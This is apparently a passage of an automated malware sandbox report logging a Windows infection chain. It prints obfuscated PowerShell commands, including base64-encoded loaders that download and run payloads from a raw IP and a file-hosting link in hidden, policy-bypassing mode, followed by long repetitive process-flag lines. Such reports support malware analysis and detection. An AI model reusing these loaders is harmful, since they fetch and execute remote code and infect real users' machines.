IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoMmtkaW1hZ2VCeXRlcycrJyk7Mmtkc3RhcnRGbGFnID0gZUM0PDxCQVNFNjRfU1RBUlQ+PmVDJysnNDsya2RlbmRGbGFnID0gZUM0PDxCQVNFNjRfRU5EPj5lQzQ7Mmtkc3RhcnRJbmRleCA9IDJrZGltYWdlVGV4dC5JbmRleE9mKDJrZHN0YXJ0RmxhZyk7MmtkZScrJ24nKydkSW5kZXggPSAya2RpbWFnZVRleHQuSW5kZXgnKydPZigya2RlbmRGbGEnKydnKTsya2RzdGFydEluZGV4IC1nZSAwIC1hbmQgMmtkZW5kSW5kZXggLWd0IDJrZHN0YXInKyd0SW5kZXg7Mmtkc3RhcnRJbmRleCArPSAya2RzdGFydEZsYWcuTGVuZ3QnKydoOzJrZGJhc2U2NExlbmd0aCA9IDJrZGVuZEluZGV4IC0gMmtkc3RhcnRJbmRleDsya2RiYXNlNjRDb21tYW5kID0gMmsnKydkaW1hZ2VUJysnZXh0LlN1YnN0cmluZygya2RzdGFydEluZGV4LCAya2RiYXNlNjRMZW5ndGgpOzJrZGJhc2U2NFJlJysndmVyc2VkID0gLWpvaW4gKDJrZGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBzeVYgRm9yRWFjaC1PYmplY3QgeyAya2RfIH0pWy0xLi4tKDJrZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07MmtkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZygya2RiYXNlNjRSZXZlcnNlZCk7MmtkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDJrZGNvbW1hbmRCeXRlcyk7MmtkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChlQzRWQUllQzQpOzJrZHZhaU1ldGhvZC5JbnZva2UoJysnMmtkbnVsbCwgQChlQzR0eHQuRkdWR0ZSLzIyNDEvNjIuNjQuOCcrJzYxLjQwMS8vOnB0dGhlQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsJysnIGVDNENhc1BvbGVDNCwgZUM0ZGVzYXRpdmFkb2VDNCwgZUM0ZGVzYXRpdmFkb2VDNCxlQycrJzRkZXNhdGl2YWRvJysnZUM0LGVDNGRlc2F0aScrJ3ZhZG9lQzQsZUM0ZGVzYXRpdmFkb2VDNCxlQzRkZXNhdGl2YWRvZUM0LGVDNGRlc2F0aXZhZG9lQycrJzQsZUM0MWVDNCxlQzRkZXNhdGl2YWRvZUM0KSk7JykgIC1jcmVwbEFDZSAgKFtjaEFSXTExNStbY2hBUl0xMjErW2NoQVJdODYpLFtjaEFSXTEyNCAgLVJlUExBY2UgIChbY2hBUl01MCtbY2hBUl0xMDcrW2NoQVJdMTAwKSxbY2hBUl0zNiAtY3JlcGxBQ2UnZUM0JyxbY2hBUl0zOSl8IC4oKGd2ICcqTURyKicpLk5BTWVbMywxMSwyXS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,13_2_0041BCE3
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_048D5662 push eax; iretd 3_2_048D5699
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04BA6D00 pushfd ; retf 081Bh9_2_04BA7179
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004567E0 push eax; ret 13_2_004567FE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0045B9DD push esi; ret 13_2_0045B9E6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00455EAF push ecx; ret 13_2_00455EC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00433FF6 push ecx; ret 13_2_00434009
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00406128 ShellExecuteW,URLDownloadToFileW,13_2_00406128
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,13_2_00419BC4

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,13_2_0041BCE3
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
